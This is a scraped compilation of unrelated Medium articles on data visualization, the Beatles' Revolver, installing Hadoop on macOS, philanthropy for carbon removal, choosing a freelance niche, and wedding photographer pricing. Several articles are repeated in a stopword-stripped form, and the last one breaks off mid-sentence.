Title Knowledge Point DataContent Every month clockwork like precision brown paper package arrives mail unwrapping revealing almost 50 year National Geographic enriching imagination connectedness planet cosmos like lattice human context It’s also important source visual aesthetic literacy see graphically visual world distinctly human whereas raw data point human essence mistaking data knowledge Big Data data visualization important topic it’s troubling they’re story reduced little illdefined link bait Accepting there’s also unified theory singular definition either data it’s visualization important discern structured bit ledger unstructured data stream social chatter data simply column row fodder It’s slice pie fill chart Spreadsheets pie chart meaningless artifact It’s art asking question brings life Transforming crumb data information turn get u possibility knowing Without structure data doesn’t become knowledge It’s like looking murky swamp trying understand dividing property amoeba Try viewing petri dish instead Appreciating there’s structure there’s meaning attracted Manual Lima’s book Visual Complexity It’s influenced appreciation visual literacy also cool seeing Mentionmapp page 153 historical context framework technique best practice Visual Complexity also help discover visualization leader we’ll write future post Lima’s depiction visualize network “the syntax new language” made impression Knowing sight translational interface visual object textual relationship my… “ahhh that’s moment” data intersects visual science need aesthetic anchoring knowledge surface art science Lima share Matt Woolman quote “functional visualization statistical analysis computation algorithm must make sense user require visual language system us colour shape line hierarchy composition communicate clearly appropriately much like alphabetic character based language used worldwide humans” TED2015 talk Lima say “we see shift tree network many domain knowledge metaphor network really already adopting various shape form it’s almost becoming growing visual taxonomy” Watch Manuel Lima visual history human knowledge Using data revealing world story art I’m appreciative Lima communicates aesthetic value visualization Turning complex chaotic meaningful social political economic human insight essential can’t get lost science data forget importance allowing eye allowing revel discover knowledge art data Conceptual artist Katie Lewis devise elaborate method recording data sensation felt various body part aspect life’s minutia plotted time using little pin thread pencil marked date artwork abstracted actual purpose organic form representing accumulation data time left describes process extremely rigid involving creation strict rule data collected documented eventually transformed pseudoscientific installation pen John cofounder Please visit Mentionmapp todayTags Manuel Lima Data Science Data Visualization Big Data Design
3,831
Revolver changed my life
Revolver changed my life I was in either 7th or 8th grade, and I went to a record store to buy a Beatles album. It was also the very first time I would ever buy a record. I didn’t know much about The Beatles other than any song I heard I liked. One summer I went to day camp at The Thomas School of Horsemanship. Whenever it rained they’d set up chairs in a big barn space and show Help. I think it was the only movie the camp had, and I saw the first 40 minutes of it five times that summer. I loved the in the floor bed John Lennon had. My aunt had two cats named George and Ringo. I knew the other two Beatles were named Paul and John. And that was the extent of my Beatles knowledge. And armed with that scant knowledge I flipped through a bunch of twelve inch 33 1/3 Beatles albums, with their always interesting covers and names. Help. Hard Days Night. Meet the Beatles (in the US it was Meet the Beatles, not With the Beatles). Sgt Peppers. Magical Mystery Tour. The white one. One with no name on it but a picture of four guys with beards and long hair walking in a neighborhood across the road. And there was this weird one with a mostly white cover and line drawings of the four of them. I flipped the various albums over and looked at song titles, figuring I’d buy whatever one had the most songs I actually knew. There were crazy titles! Being For the Benefit of Mr Kite! Polyethylene Pam! Dear Prudence! The Word! I didn’t know these songs. There were so many songs I didn’t know. I couldn’t imagine what they all might sound like. On the mostly white one with the weird cover drawings I knew two songs, Eleanor Rigby and Yellow Submarine, so that was the album I bought. We had a cheap shit stereo at home and a good stereo at home. The cheap shit one was a Panasonic all-in-one with Thruster Speakers… I played the first album I ever bought on the Panasonic in the kids room downstairs in our house. We all have expectations. I knew Eleanor Rigby and Yellow Submarine, so that was what I expected Revolver to sound like. Revolver side one song one begins with some noise — some squirps and chatter, and then a voice: “One Two Three…” Suddenly, a guitar chord slams like someone dropping a metal garbage can lid, a huge bass rolls in and a weird, nasal voice announces, “Let me tell you how it will be…” “What the fuck is this?” I thought. Taxman. Good god. From there it went all around the planet and into the stars. I’d never heard anything like it. Side one ended with a short, fireball of a song called She Said She Said. It was the coolest guitar playing I’d ever heard. The drumming — there’s no words for it. It’s perfect and at the same time it sounds like someone falling down the stairs. The voice trails off at the end, overlapping and repeating, “I know what it’s like to be dead I know what it is to be sad I know what it’s like to be dead I know what it is to be sad….” She Said She Said became my official favorite Beatles song. Side one… I flipped the record over and played side two… There is nothing that can possibly… I mean… how do you even begin to talk about the last song on side 2, the last song on Revolver? How do you talk about Tomorrow Never Knows? It starts with a whine, kick ass drums, and then what sounds like a rampant army of angry lemmings fade in. 
Throughout it are jags of violins and orchestras, more lemmings, what sounds like a radio message from outer space that I later discovered was a backwards guitar solo, impenetrable lyrics, a bass that was one note over and over again until the whole thing spun apart into a player piano and a last violin line sucked up into a hole in the sky. It was like the world sounded different after that song. There’s STILL nothing like it. Tomorrow Never Knows is a singularity. It’s the weirdest catchy beautiful cacophony ever made. Who knows what the hell it is. Heaven, hell, all places in between. Up down, left right, in out. I had sat there, my chin perched on the back of a couch with my head stuck between the speakers for 35 minutes, and I was exhausted. I lay on the floor and looked at the album jacket, the drawn and collaged front, and the photo of the band on the back. I knew this was my favorite album, and that that would never change. And I knew… I knew that I wanted to do something that I didn’t have a name for. I wanted to be in a band and play guitar and write songs — I knew all that, but there was something else. I wanted to… be part of something like Revolver. To build something like that. To make records. Records that weren’t just music. At the top of the back cover, above the list of songs, there was a sentence I didn’t quite understand. It said, “Recording produced by GEORGE MARTIN.” I didn’t know what it meant, but I was pretty sure it was the job description for me. I went on to produce records. Revolver was the standard and the inspiration. After my tinnitus ended thoughts of working in music, I went on to direct plays, and again Revolver was there somehow. Somehow the sense of humor, experimentation, the delight, the oddness, the gorgeousness, the memorability of Revolver is always with me. After 40+ years, Revolver still clues me into the power of art, the power of music, and what it means to manifest the invisible — to do the work of the artist.
https://lukedelalio.medium.com/revolver-changed-my-life-f0b753f70901
['Luke Delalio']
2020-09-26 00:31:19.766000+00:00
['Beatles', 'Creativity', 'Revolver', 'Music']
Title Revolver changed lifeContent Revolver changed life either 7th 8th grade went record store buy Beatles album also first time would ever buy record didn’t know much Beatles song heard liked One summer went day camp Thomas School Horsemanship Whenever rained they’d set chair big barn space show Help think movie camp saw first 40 minute five time summer loved floor bed John Lennon aunt two cat named George Ringo knew two Beatles named Paul John extent Beatles knowledge armed scant knowledge flipped bunch twelve inch 33 13 Beatles album always interesting cover name Help Hard Days Night Meet Beatles US Meet Beatles Beatles Sgt Peppers Magical Mystery Tour white one One name picture four guy beard long hair walking neighborhood across road weird one mostly white cover line drawing four flipped various album looked song title figuring I’d buy whatever one song actually knew crazy title Benefit Mr Kite Polyethylene Pam Dear Prudence Word didn’t know song many song didn’t know couldn’t imagine might sound like mostly white one weird cover drawing knew two song Eleanor Rigby Yellow Submarine album bought cheap shit stereo home good stereo home cheap shit one Panasonic allinone Thruster Speakers… played first album ever bought Panasonic kid room downstairs house expectation knew Eleanor Rigby Yellow Submarine expected Revolver sound like Revolver side one song one begin noise — squirps chatter voice “One Two Three…” Suddenly guitar chord slam like someone dropping metal garbage lid huge bass roll weird nasal voice announces “Let tell be…” “What fuck this” thought Taxman Good god went around planet star I’d never heard anything like Side one ended short fireball song called Said Said coolest guitar playing I’d ever heard drumming — there’s word It’s perfect time sound like someone falling stair voice trail end overlapping repeating “I know it’s like dead know sad know it’s like dead know sad…” Said Said became official favorite Beatles song Side one… flipped record played side two… nothing possibly… mean… even begin talk last song side 2 last song Revolver talk Tomorrow Never Knows start whine kick as drum sound like rampant army angry lemming fade Throughout jag violin orchestra lemming sound like radio message outer space later discovered backwards guitar solo impenetrable lyric bass one note whole thing spun apart player piano last violin line sucked hole sky like world sounded different song There’s STILL nothing like Tomorrow Never Knows singularly It’s weirdest catchy beautiful cacophony ever made know hell Heaven hell place left right sat chin perched back couch head stuck speaker 35 minute exhausted laid floor looked album jacket drawn collaged front photo band back knew favorite album would never change knew… knew wanted something didn’t name wanted band play guitar write song — knew something else wanted to… part something like Revolver build something like make record Records weren’t music top back cover list song sentence didn’t quite understand said “Recording produced GEORGE MARTIN” didn’t know meant pretty sure job description went produce record Revolver standard inspiration tinnitus ended thought working music went direct play Revolver somehow Somehow sense humor experimentation delight oddness gorgeousness memorability Revolver always 40 year Revolver still clue power art power music mean manifest invisible — work artistTags Beatles Creativity Revolver Music
3,832
Installing Hadoop on a Mac
Is the only thing standing between you and Hadoop just trying to figure out how to install it on a Mac? A quick internet search will show you the lack of information about this fairly simple process. In this brief tutorial, I will show you how you can very easily install Hadoop 3.2.1 on a macOS Mojave (version 10.14.6) using Terminal for a single node cluster in pseudo-distributed mode. To begin, you will need to have installed several packages that need to be placed in the appropriate directories. The HomeBrew website has made this a very simple task, automatically determining what is needed on your machine, installing correct directories and symlinking their files into /user/local. Additional documentation may also be found on their website. Install HomeBrew Copy the command at the top of the page and paste into a new terminal window. You will be notified of what will be installed. Pressing RETURN initiates the process: $ /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" Confirm you have the correct version of java (version 8) on your machine. If it returns anything other than 1.8., be sure to install the correct version. $ java -version $ brew cask install homebrew/cask-versions/adoptopenjdk8 Install Hadoop Next, you will install the most current version of Hadoop at the path: /usr/local/Cellar/hadoop. This happens to be 3.2.1 at the time of the writing of this article: $ brew install hadoop Configure Hadoop Configuring Hadoop will take place over a few steps. A more detailed version can be found in the Apache Hadoop documentation for setting up a single node cluster. (Be sure to follow along with the correct version installed on your machine.) Updating the environment variable settings Make changes to core-, hdfs-, mapred- and yarn-site.xml files Remove password requirement (if necessary) Format NameNode Open the document containing the environment variable settings : $ cd /usr/local/cellar/hadoop/3.2.1/libexec/etc/hadoop $ open hadoop-env.sh Make the following changes to the document, save and close. 
Add the location for export JAVA_HOME export JAVA_HOME= “/Library/Java/JavaVirtualMachines/adoptopenjdk-8.jdk/Contents/Home” You can find this path by using the following code in the terminal window: $ /usr/libexec/java_home Replace information for export HADOOP_OPTS change export HADOOP_OPTS=”-Djava.net.preferIPv4Stack=true” to export HADOOP_OPTS = ”-Djava.net.preferIPv4Stack=true -Djava.security.krb5.realm= -Djava.security.krb5.kdc=” Make changes to core files $ open core-site.xml <configuration> <property> <name>fs.defaultFS</name> <value>hdfs://localhost:9000</value> </property> </configuration> Make changes to hdfs files $ open hdfs-site.xml <configuration> <property> <name>dfs.replication</name> <value>1</value> </property> </configuration> Make changes to mapred files $ open mapred-site.xml <configuration> <property> <name>mapreduce.framework.name</name> <value>yarn</value> </property> <property> <name>mapreduce.application.classpath</name> <value>$HADOOP_MAPRED_HOME/share/hadoop/mapreduce/*:$HADOOP_MAPRED_HOME/share/hadoop/mapreduce/lib/*</value> </property> </configuration> Make changes to yarn files $ open yarn-site.xml <configuration> <property> <name>yarn.nodemanager.aux-services</name> <value>mapreduce_shuffle</value> </property> <property> <name>yarn.nodemanager.env-whitelist</name> <value>JAVA_HOME,HADOOP_COMMON_HOME,HADOOP_HDFS_HOME,HADOOP_CONF_DIR,CLASSPATH_PREPEND_DISTCACHE,HADOOP_YARN_HOME,HADOOP_MAPRED_HOME</value> </property> </configuration> Remove password requirement Check if you’re able to ssh without a password before moving to the next step to prevent unexpected results when formatting the NameNode. $ ssh localhost If this does not return a last login time, use the following commands to remove the need to insert a password. $ ssh-keygen -t rsa -P '' -f ~/.ssh/id_rsa $ cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys $ chmod 0600 ~/.ssh/authorized_keys Format NameNode $ cd /usr/local/cellar/hadoop/3.2.1/libexec/bin $ hdfs namenode -format A warning will tell you that a directory for logs is being created. You will be prompted to re-format filesystem in Storage Directory root. Say Y and press RETURN. Run Hadoop $ cd /usr/local/cellar/hadoop/3.2.1/libexec/sbin $ ./start-all.sh $ jps After running jps, you should have confirmation that all the parts of Hadoop have been installed and running. You should see something like this: 66896 ResourceManager 66692 SecondaryNameNode 66535 DataNode 67350 Jps 66422 NameNode67005 NodeManager Open a web browser to see your configurations for the current session. http://localhost:9870 Information about your current Hadoop session. Close Hadoop Close Hadoop when you are all done. $ ./stop-all.sh I hope this short article has helped you get over the hurdle of installing Hadoop on your macOS machine!
https://towardsdatascience.com/installing-hadoop-on-a-mac-ec01c67b003c
['Siphu Langeni']
2020-04-02 02:37:52.066000+00:00
['Data Science', 'Hadoop', 'Data Engineering', 'Big Data', 'Mac Os X']
Title Installing Hadoop MacContent thing standing Hadoop trying figure install Mac quick internet search show lack information fairly simple process brief tutorial show easily install Hadoop 321 macOS Mojave version 10146 using Terminal single node cluster pseudodistributed mode begin need installed several package need placed appropriate directory HomeBrew website made simple task automatically determining needed machine installing correct directory symlinking file userlocal Additional documentation may also found website Install HomeBrew Copy command top page paste new terminal window notified installed Pressing RETURN initiate process usrbinruby e curl fsSL httpsrawgithubusercontentcomHomebrewinstallmasterinstall Confirm correct version java version 8 machine return anything 18 sure install correct version java version brew cask install homebrewcaskversionsadoptopenjdk8 Install Hadoop Next install current version Hadoop path usrlocalCellarhadoop happens 321 time writing article brew install hadoop Configure Hadoop Configuring Hadoop take place step detailed version found Apache Hadoop documentation setting single node cluster sure follow along correct version installed machine Updating environment variable setting Make change core hdfs mapred yarnsitexml file Remove password requirement necessary Format NameNode Open document containing environment variable setting cd usrlocalcellarhadoop321libexecetchadoop open hadoopenvsh Make following change document save close Add location export JAVAHOME export JAVAHOME “LibraryJavaJavaVirtualMachinesadoptopenjdk8jdkContentsHome” find path using following code terminal window usrlibexecjavahome Replace information export HADOOPOPTS change export HADOOPOPTS”DjavanetpreferIPv4Stacktrue” export HADOOPOPTS ”DjavanetpreferIPv4Stacktrue Djavasecuritykrb5realm Djavasecuritykrb5kdc” Make change core file open coresitexml configuration property namefsdefaultFSname valuehdfslocalhost9000value property configuration Make change hdfs file open hdfssitexml configuration property namedfsreplicationname value1value property configuration Make change mapred file open mapredsitexml configuration property namemapreduceframeworknamename valueyarnvalue property property namemapreduceapplicationclasspathname valueHADOOPMAPREDHOMEsharehadoopmapreduceHADOOPMAPREDHOMEsharehadoopmapreducelibvalue property configuration Make change yarn file open yarnsitexml configuration property nameyarnnodemanagerauxservicesname valuemapreduceshufflevalue property property nameyarnnodemanagerenvwhitelistname valueJAVAHOMEHADOOPCOMMONHOMEHADOOPHDFSHOMEHADOOPCONFDIRCLASSPATHPREPENDDISTCACHEHADOOPYARNHOMEHADOOPMAPREDHOMEvalue property configuration Remove password requirement Check you’re able ssh without password moving next step prevent unexpected result formatting NameNode ssh localhost return last login time use following command remove need insert password sshkeygen rsa P f sshidrsa cat sshidrsapub sshauthorizedkeys chmod 0600 sshauthorizedkeys Format NameNode cd usrlocalcellarhadoop321libexecbin hdfs namenode format warning tell directory log created prompted reformat filesystem Storage Directory root Say press RETURN Run Hadoop cd usrlocalcellarhadoop321libexecsbin startallsh jps running jps confirmation part Hadoop installed running see something like 66896 ResourceManager 66692 SecondaryNameNode 66535 DataNode 67350 Jps 66422 NameNode67005 NodeManager Open web browser see configuration current session httplocalhost9870 Information current Hadoop session Close Hadoop Close Hadoop 
done stopallsh hope short article helped get hurdle installing Hadoop macOS machineTags Data Science Hadoop Data Engineering Big Data Mac Os X
3,833
How philanthropy can help to scale carbon removal
To be clear, we are not suggesting that more mature solutions merit less support — rather, forestry, BECCS, and DAC simply require different types of support concomitant with their relative level of technological readiness. For instance, funding for communications is required to socialize the understanding that not all removal equates to BECCS, and that direct air capture is poised for rapid cost reductions as it will benefit from learning by doing and economies of scale (much in the same way as solar photovoltaics continually beat expert forecasts on price declines and capacity additions). However, we will focus this discussion on several less-heralded carbon removal solutions: enhanced weathering, soil carbon sequestration, and ocean removal approaches. Many of these solutions still have major question marks that philanthropic funding can help answer in order to drive their development forward. Enhanced weathering: Over geologic time scales, the natural weathering of rocks containing certain minerals — like serpentine, silicates, carbonates, and oxides — draws down carbon dioxide from the atmosphere and stores it in stable mineral forms, thereby playing an important role in regulating atmospheric CO2 concentrations. The centuries and millennia that these reactions typically take are too slow to help with the climate crisis. Fortunately, there are ways of safely speeding up the weathering. By grinding up rocks to increase their reactive surface area or by adding heat or acids to speed up reaction rates, enhanced weathering could be an important climate solution with huge potential to scale. (Experts estimate that, after considering energy requirements, enhanced weathering could reasonably remove up to 4 gigatons of carbon per year.) Philanthropy can support basic research to substantiate these claims in the real world, focusing on supporting process improvements and mapping resource potentials. If the benefits of enhanced weathering prove to exceed the challenges, the near-term research efforts funded by philanthropy can help unlock greater government RD&D and help secure private capital to move this approach from the lab to pilots. Soil carbon sequestration: Soils have the potential to store carbon at scale, though global soils have historically lost an estimated 133 Gt of carbon due to human-driven land use change. Today, there are a wide variety of land management strategies, practices, and technologies that fall under the aegis of soil carbon sequestration that can restore a portion of this lost carbon. However, there is no one-size fits all system that can help realize that scale. The efficacy of these practices turns on local soil type, climatic factors, and crop type. Philanthropy has been and should continue to fund research to better answer basic questions around which practices are most effective in what scenarios and how permanent the removal is. In addition to practice change, research to explore new varieties and crop types that sequester more carbon will be critical. For example, we are learning that switching to crop types with long roots, such as kernza, may support even greater soil carbon storage potential than can be realized through land management practice changes alone. There is also currently no streamlined, consistent, and cost-effective way to measure and verify soil carbon sequestration on the farm-level. 
This lack of protocols could greatly influence our assessment of soil carbon sequestration potential and hinder the incorporation of these practices into climate policy frameworks. Philanthropy can play a big role in incentivizing streamlining among current standards and in helping to set up the frameworks of the future. Sequestration efforts should also be combined with efforts to boost crop yields, allowing us to store more carbon in the soil, prepare our food systems for the effects of a changing climate, and free up additional land for high-carbon ecosystems (such as forests and wetlands). Increasingly, land will be stretched to deliver on multiple priorities — from food production to ecosystem services to bioenergy production to carbon sequestration — and philanthropy can play an important coordination and consolidation role among these veins of research. Ocean approaches: There are a number of ocean-based approaches that haven't been explored in detail to date. In fact, the National Academy of Sciences excluded ocean approaches (except coastal wetland restoration) from its recent landmark report. These approaches utilize ocean ecosystems to sequester carbon and can include direct ocean capture, kelp farming, ocean alkalinity enhancement, and other blue carbon approaches. Because many of these strategies are in the early stages of development today, it will be important for philanthropy to support analyses to better understand the technical and economic potential of these solutions, as well as any risks from early deployment that would necessitate governance standards in the near term. There are a number of ocean-based approaches to carbon removal that haven't been explored in detail to date, including kelp farming. Photo: Shane Stagner Climate philanthropy is in a unique position to accelerate progress on carbon removal and increase the odds that multiple removal approaches reach gigaton scale before 2050. Our theory of change is rooted in our abilities and limitations. Philanthropy can support research (both into technical aspects and into communications and messaging strategies), fund advocacy, policy development, and governance frameworks, and take on risks that governments or the private sector can't or won't. However, philanthropic resources are small relative to the many trillions in public and private capital that will ultimately need to be allocated toward climate solutions. Thus, any credible strategy from philanthropy should be focused on removing barriers and unlocking other forms of capital. The task ahead is daunting, and we are clear-eyed about what Paris-compatibility will entail — multiple simultaneous transformations in the ways that we produce, transport, and consume. Carbon removal is not a stand-alone task; removal approaches must be integrated into the larger economic and ecological systems they are deployed into. There are some carbon removal approaches that we know will have multiple benefits and can scale — these we should begin supporting through communications, policy development, advocacy, and investment. There are also many other approaches where it is too early to tell if they will be able to contribute to large-scale removal — but the urgency of the problem demands that we explore all options that hold the promise of arresting and reversing the climate crisis.
https://carbon180.medium.com/2050-priorities-for-climate-action-how-philanthropy-can-help-to-scale-carbon-removal-c0ac667361e6
[]
2019-06-05 20:13:10.407000+00:00
['Climate Change', 'Philanthropy', 'Future', 'Technology', 'Science']
Title philanthropy help scale carbon removalContent clear suggesting mature solution merit le support — rather forestry BECCS DAC simply require different type support concomitant relative level technological readiness instance funding communication required socialize understanding removal equates BECCS direct air capture poised rapid cost reduction benefit learning economy scale much way solar photovoltaics continually beat expert forecast price decline capacity addition However focus discussion several lessheralded carbon removal solution enhanced weathering soil carbon sequestration ocean removal approach Many solution still major question mark philanthropic funding help answer order drive development forward Enhanced weathering geologic time scale natural weathering rock containing certain mineral — like serpentine silicate carbonate oxide — draw carbon dioxide atmosphere store stable mineral form thereby playing important role regulating atmospheric CO2 concentration century millennium reaction typically take slow help climate crisis Fortunately way safely speeding weathering grinding rock increase reactive surface area adding heat acid speed reaction rate enhanced weathering could important climate solution huge potential scale Experts estimate considering energy requirement enhanced weathering could reasonably remove 4 gigatons carbon per year Philanthropy support basic research substantiate claim real world focusing supporting process improvement mapping resource potential benefit enhanced weathering prove exceed challenge nearterm research effort funded philanthropy help unlock greater government RDD help secure private capital move approach lab pilot Soil carbon sequestration Soils potential store carbon scale though global soil historically lost estimated 133 Gt carbon due humandriven land use change Today wide variety land management strategy practice technology fall aegis soil carbon sequestration restore portion lost carbon However onesize fit system help realize scale efficacy practice turn local soil type climatic factor crop type Philanthropy continue fund research better answer basic question around practice effective scenario permanent removal addition practice change research explore new variety crop type sequester carbon critical example learning switching crop type long root kernza may support even greater soil carbon storage potential realized land management practice change alone also currently streamlined consistent costeffective way measure verify soil carbon sequestration farmlevel lack protocol could greatly influence assessment soil carbon sequestration potential hinder incorporation practice climate policy framework Philanthropy play big role incentivizing streamlining among current standard helping set framework future Sequestration effort also combined effort boost crop yield allowing u store carbon soil prepare food system effect changing climate free additional land highcarbon ecosystem forest wetland Increasingly land stretched deliver multiple priority — food production ecosystem service bioenergy production carbon sequestration — philanthropy play important coordination consolidation role among vein research Ocean approach number oceanbased approach haven’t explored detail todate fact National Academy Sciences excluded ocean approach except coastal wetland restoration recent landmark report approach utilize ocean ecosystem sequester carbon include direct ocean capture kelp farming ocean alkalinity enhancement blue carbon approach many strategy early 
stage development today important philanthropy support analysis better understand technical economic potential solution well risk early deployment would necessitate governance standard near term number oceanbased approach carbon removal haven’t explored detail todate including kelp farming Photo Shane Stagner Climate philanthropy unique position accelerate progress carbon removal increase odds multiple removal approach reach gigaton scale 2050 theory change rooted ability limitation Philanthropy support research technical aspect communication messaging strategy fund advocacy policy development governance framework take risk government private sector can’t won’t However philanthropic resource small relative many trillion public private capital ultimately need allocated toward climate solution Thus credible strategy philanthropy focused removing barrier unlocking form capital task ahead daunting cleareyed Pariscompatibility entail — multiple simultaneous transformation way produce transport consume Carbon removal standalone task must integrated larger economic ecological system deployed carbon removal approach know multiple benefit scale — begin supporting communication policy development advocacy investment also many approach early tell able contribute largescale removal — urgency problem demand explore option hold promise arresting reversing climate crisisTags Climate Change Philanthropy Future Technology Science
3,834
To Find a Niche, Stop Looking
The niche issue always leaves people confused. The idea of focusing on one theme for your content can be horrifying. How can you forget other topics or specialties and focus on one thing alone? Doesn't it mean that you're limiting yourself to fewer people? Doesn't that mean less money? These are the questions that go through your mind when it comes to picking a niche, but Pat Flynn says it best: There are riches in the niches. To charge more, you have to niche down. Nobody takes generalists seriously. You wouldn't feel safe with a doctor who claims to know how to treat every part of your body — you would want to work with a specialist. The same thing goes for your clients. They wouldn't want to work with a freelancer who claims to be an expert in everything, because you cannot give 100% to several things. I remember when I was writing the content for my website (it's now live, by the way) and I wanted to create content for the service page. Initially, I tried to include all the things I know how to do. I wanted to offer everything — landing pages, emails, sales letters, sales brochure copies, ebook writing, SEO, and social media management services. In the agencies I work for, I do all of these, so I'm pretty experienced in them. But I wanted to include what I was best at and what came to me easily. Before now, I've had clients commend me on how well I use storytelling to make their blog posts and emails more engaging. I figured out that I easily come up with content for blogs and emails, but the others seemed more challenging (I still delivered good results, though). I just included the two skills I was best at and used them as my main service offerings — and I've been going on with them. I see it a lot on freelancing marketplaces: people include many skills on their profiles. I can understand that the mindset behind it is to attract a broader range of clients, but it shouldn't be so, because specialty is essential. You have to specialize in something to be able to charge premium fees. Everybody has that thing they do effortlessly that other people complain is difficult. Writing is that thing for me. And within writing, there are sub-niches. I picked blog posts and emails as my specialty because I'm good at using stories to improve content engagement. I cringe when I write some technical pieces that don't have any flair because it's simply not me. I understand this, so naturally, I'd have to lean towards what I'm best at.
https://medium.com/change-your-mind/to-find-a-niche-stop-looking-f06c848478f2
['Tochukwu Okoro E.']
2020-06-26 11:47:11.899000+00:00
['Inspiration', 'Freelancing', 'Writing Tips', 'Creativity', 'Writing']
Title Find Niche Stop LookingContent niche issue would always leave people confused point focusing one theme content horrifying forget topic specialty focus one thing alone Doesn’t mean you’re limiting fewer people Doesn’t mean le money question go mind come picking niche Pat Flynn say best rich niche charge niche Nobody take generalist seriously wouldn’t feel safe Doctor claim know treat every part body — would want work specialist thing go client wouldn’t like work freelancer claim expert everything cannot give 100 several thing remember writing content website it’s live way wanted create content service page Initially tried include thing know wanted write — landing page email sale letter sale brochure copy ebook writing SEO social medium management service agency work I’m pretty experienced wanted include best came easily I’ve client commend well use storytelling make blog post email engaging figured easily come content blog email others seemed challenging still delivered good result though included two skill best used main service offering — I’ve going see lot freelancing marketplace people include many skill profile Although understand mindset behind attract broader range client shouldn’t specialty essential specialize something able charge premium fee Everybody thing effortlessly people complain difficult Writing thing within writing subniches picked blog post email specialty I’m good using story improve content engagement cringe write technical piece don’t flair it’s simply understand naturally I’d lean towards I’m best atTags Inspiration Freelancing Writing Tips Creativity Writing
3,835
How Much Should a First Time Wedding Photographer Cost?
Last Updated: August 9th, 2019 The average price range we would expect a first time wedding photographer to charge for their services is between $0 and $1,000. Some photographers looking for their absolute first wedding experience may be willing to shoot for free in exchange for "exposure" and the ability to build their wedding photography portfolio. On the other hand, some photographers will deem their time worth something monetary, but will still want to offer highly discounted services to be competitive with other established photographers in the marketplace. There is no hard and fast rule on any of this. Our opinion is based on our own personal experience pricing our wedding photography services and seeing the starting rates that were charged by other photographers around the web and in our circle of friends. If you're here just for the hard numbers, you have them already! If you want to know why we feel a first time wedding photographer will fall in the $0 — $1,000 price range, we're going to cover that in more detail now. The Photography Intern vs. the Photography Professional No matter what job a person chooses to work, there will be some level of a learning curve. The best wedding photographers will normally have the opportunity to assist, shadow, and second shoot with other already established wedding photographers to get a taste of the work without having to fully invest themselves into the responsibilities of the job. We often think of starting photographers as the "interns" of the wedding industry, in much the same way a person would intern to be a teacher, counselor, etc. While the idea of an "unpaid intern" seems to be getting less common (at least in the United States), it still remains one potential route. The idea here is that this intern is receiving compensation in the form of experience — and that may be sufficient compensation for some. This is just the simple fact — and while many photographers (and frankly, creatives working in virtually any industry) will object to the idea of "working for exposure", we can at least understand the logic behind it. What working for "exposure" actually results in Okay — just because we can make sense of working for exposure doesn't mean we agree with it in principle. This is especially true in the field of wedding photography — which is very high pressure and high stress at times. As an outsider looking in, it may seem easy enough — a person taking pictures of people getting married. In practice, though, there's a lot more to it. Communication and designing effective logistics for the wedding day are just a few of the things outside of "photography" that we do. Some of the earliest shoots we did were for free, with exposure being the incentive. While growing our portfolio was beneficial, the exposure never really translated into anything tangible. We rarely received referrals of new business from these shoots. While we benefited from the hands-on experience (and maybe for some this is enough!), that was about the extent of our benefit. Every wedding photographer, new or experienced, has to decide what their time is worth. For those just starting out, working for free to get that little bit of experience may be okay, and that's a fine decision if you go that route. For us — our time is valuable, and free is never an option anymore (save maybe for shooting photos through a charity like Now I Lay Me Down to Sleep). A wedding photographer's job is not just 8 hours on a single wedding day.
In practice, every booking we have results in at least 40–80 hours of work — an engagement shoot, wedding day shooting, photo editing, email communications, in-person meetings, assembling a timeline, etc. Whether you are a photographer trying to figure out your pricing, or a prospective client looking to figure out how much you should be expecting to pay — we challenge you to keep this in mind. The wedding photographers you are looking at (or maybe comparing yourself to in some ways) are people too, and they probably put a ton more into their job than you realize. They should be paid accordingly — and they get to dictate their value. If that value is free for the first client — then fine, let them do it. If it's $500 — then rad, let them do it. If they decide to take a giant leap and maybe already have a lot of photography experience in other niches, then by all means they can jump in at a higher price point. But make no mistake about it: exposure doesn't = compensation. Rarely does the promise of exposure pay off. Money = Real Compensation The defining feature of a professional wedding photographer is that they will charge money (any amount) for their services. As we started to charge to shoot weddings and other sessions, we began to approach things as a business instead of as someone just dabbling in what is virtually a new hobby. The money we made we invested again and again into new camera gear and professional services to make our workflows better and give our clients better experiences, and over time it allowed us to do things with money on a personal level, like travel more. We think it's entirely reasonable for a person just starting out in this industry to get their feet wet with little or no financial incentive, but that is not a sustainable way of living. Our efforts have value — even if they are ultimately artistic pursuits. If you're a newbie wedding photographer, consider charging even $50 for your first wedding. If you don't have the photography portfolio established, at least make people value your time and efforts. If you're a potential client looking for a wedding photographer on the cheap, be willing to spend at least a little bit of money on someone who will be present and documenting one of the most important days of your life. If the photographer is against charging you, consider dropping them a tip at the end of the night as a way of saying thanks for their time. 3 Benefits of Hiring a First Time Wedding Photographer 1). Lower costs for clients on a budget. For people looking to hire a wedding photographer without a lot of extra spending money, those photographers just starting out are going to be a good match. While they won't have the level of experience or portfolio to support them, they can still be great to work with and capture the day. When we got married back in 2016, we were on a tight budget for our wedding. While wedding photography was important to us, at the time affording a $5,000 photographer wasn't in the cards as we struggled to even keep our rented house heated — even though we love and respect the work of the people we saw. We ended up finding a great photographer who was starting out; we had a rocking time, love our photos, and still stay connected as we've had the opportunity to see her grow her wedding photo business. 2). Creating opportunities for the photographer. The photography industry is filled with a lot of people available to take on work. Often, the hardest part is getting the first gig or two.
As a client, giving someone a chance to make their dreams come true is a huge deal. Obviously, you will want to be sure you click with the person and they seem like they can come through (within reason) on what you are wanting — but this is a great side effect. 3). They will bring an unrestricted point of view to your wedding. It’s easy for wedding photographers who have done dozens (or hundreds) of weddings to get into a simple mindset of doing the same things over and over. Don’t get us wrong — there is definitely value to that sort of approach in some situations, but it can just as easy turn into cynicism and a bad case of “honing it in” just to get some shots done. Beginner photographers will often be a lot more unhinged. They’re more excited to take great photos, and have a really great time doing it since it won’t feel like work just yet. Photographing one wedding is a lot different than photographing your 60th — we can tell you that! 3 Downsides of Hiring a First Time Wedding Photographer 1). They lack experience. After the wedding day is over, it’s really easy to tell the good wedding photographers from the bad ones. As we’ve pointed out, not all beginner photographers will be bad — but we can say they will lack the experience that is sometimes necessary to navigate wedding days successfully. You might be thinking — weddings aren’t that hard!! Sure — some of them are not. But others throw curveballs with schedules being thrown off, family & friends of the B&G stirring up drama, and so on. A photographer with a lot of wedding experience will be able to better adapt and get the shots that are needed. More than this — they will be able to predict these types of things as well. 2). They lack organization. We look back at our earliest weddings and realize — “wow, we were pretty disorganized!” We struggled with figuring out the flow of the day, communicating effectively with clients, and even just finding our way around wedding venues. Since then, our approach has become much more refined and, well, professional. Now we start to get organized before many of our clients even book with us. We get all the info we need upfront. We send out a wedding questionnaire about a month in advance and put together a timeline 